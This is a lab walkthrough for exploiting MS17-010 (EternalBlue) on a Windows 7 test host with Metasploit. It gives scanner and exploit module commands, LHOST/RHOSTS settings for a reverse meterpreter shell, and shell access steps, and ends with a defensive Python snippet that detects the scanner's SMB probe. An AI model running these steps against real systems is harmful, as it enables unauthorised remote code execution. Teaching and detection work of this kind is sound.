Environment to prepare

Target: 192.168.164.129 (Windows 7)

Vulnerability: MS17-010 (Eternal Blue)

Goal: obtain remote code execution on the target with the highest possible privileges

First, determine the target and vulnerability

1. Run msfconsole to enter the MSF console, then check whether the target host (192.168.164.129) answers ping, scan the host with nmap to confirm that port 445 is open, and then use MSF to test whether the vulnerability exists.



Second, find the verification module and call it

1. Use the #search MS17-010 command to search for the MS17-010 modules, as shown in the figure below:



2. Auxiliary module #1 is used to probe the target and see whether the vulnerability can be exploited before launching the actual attack.

#use auxiliary/scanner/smb/smb_ms17_010



3. Use the #show options command to view the Required options (Required is yes).



4. Set the target address and the target port:

#set RHOSTS 192.168.164.129
#set RPORT 445



5. Finally, run the #run or #exploit command to check whether the vulnerability exists.



6. The output "Host is likely VULNERABLE to MS17-010!" means this host has the MS17-010 vulnerability and can be exploited. The scanner also tells us that the target's operating system is Windows 7 Professional, so we can move on to the exploit module.

A result marked with a + sign means the host can be attacked; RHOSTS also accepts an IP range, so a whole subnet can be scanned at once.

Third, use the exploit module for exploitation

1. The vulnerability was confirmed on the target in the second step; now we start the exploitation. Use the #back command to leave the auxiliary module, as shown in the figure below:



2. Use #search MS17-010 again to list the MS17-010 modules, as shown in the figure below:



3. In the second step the auxiliary module was used for detection; this time the exploit module is used to exploit the vulnerability. Here we choose #2:

#use exploit/windows/smb/ms17_010_eternalblue



4. Run the #show options command to view the parameters that need to be set, as shown in the figure below:



Here we see the payload option.





6. This option controls the shell connection that is established between the target and LHOST after a successful attack, so the LHOST parameter is set to our own local IP address, while RHOSTS is still the target's IP address:

#set RHOSTS 192.168.164.129
#set LHOST 192.168.164.128



Payload set

7. Finally, use the #run command to launch the exploit.



8. A meterpreter prompt appears: the exploitation succeeded and we now have a session on the target machine. We can use the #shell command to open a shell on the target.



9. Type shell to enter the target machine's command shell; run chcp 65001 to switch the console code page to UTF-8 so the output displays correctly.
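The "likely VULNERABLE" verdict in step 6 comes from one SMB transaction on FID 0 against IPC$ and the NT status the server answers with, which is also what a defender can look for in SMB telemetry. The following is an added example, not code from the original post or from Metasploit; the record format and sample traffic are constructed for this example.

```python
# Added example (not from the original post): how the MS17-010 scanner's
# verdict is derived, and how a defender can spot the same probe in SMB
# telemetry. The record format below is constructed for this example.
from typing import Dict, List, Tuple

# Real NT status codes; the verdict mapping follows the documented behaviour
# of auxiliary/scanner/smb/smb_ms17_010 (a transaction on FID 0 over IPC$).
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: "likely VULNERABLE"
STATUS_ACCESS_DENIED = 0xC0000022            # patched
STATUS_INVALID_HANDLE = 0xC0000008           # patched

Record = Dict[str, object]


def classify_probe_status(status: int) -> str:
    """Translate the status returned to the FID 0 transaction into the
    verdict the scanner prints."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"
    return "unknown"


def detect_ms17_010_probes(records: List[Record]) -> List[Tuple[str, str, str]]:
    """Return (src, dst, verdict) for every SMB transaction on FID 0 against
    IPC$: normal clients do not send transactions on FID 0, so each hit is a
    probe, and the verdict tells the defender whether the probed host is exposed."""
    hits = []
    for r in records:
        if r["cmd"] == "SMB_COM_TRANSACTION" and r["tree"] == "IPC$" and r["fid"] == 0:
            hits.append((r["src"], r["dst"], classify_probe_status(r["status"])))
    return hits


# Constructed telemetry: the attacker box from the walkthrough probing two
# hosts, plus ordinary file traffic that must not be flagged.
SAMPLE_RECORDS: List[Record] = [
    {"src": "192.168.164.128", "dst": "192.168.164.129", "tree": "IPC$",
     "cmd": "SMB_COM_TRANSACTION", "fid": 0, "status": STATUS_INSUFF_SERVER_RESOURCES},
    {"src": "192.168.164.128", "dst": "192.168.164.130", "tree": "IPC$",
     "cmd": "SMB_COM_TRANSACTION", "fid": 0, "status": STATUS_ACCESS_DENIED},
    {"src": "192.168.164.50", "dst": "192.168.164.129", "tree": "share",
     "cmd": "SMB_COM_READ_ANDX", "fid": 0x4001, "status": 0x00000000},
]

if __name__ == "__main__":
    for src, dst, verdict in detect_ms17_010_probes(SAMPLE_RECORDS):
        print(f"MS17-010 probe {src} -> {dst}: target {verdict}")
```

A host that answers the probe with STATUS_INSUFF_SERVER_RESOURCES needs the MS17-010 update applied and SMBv1 disabled; the probing source is worth investigating regardless of the verdict.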
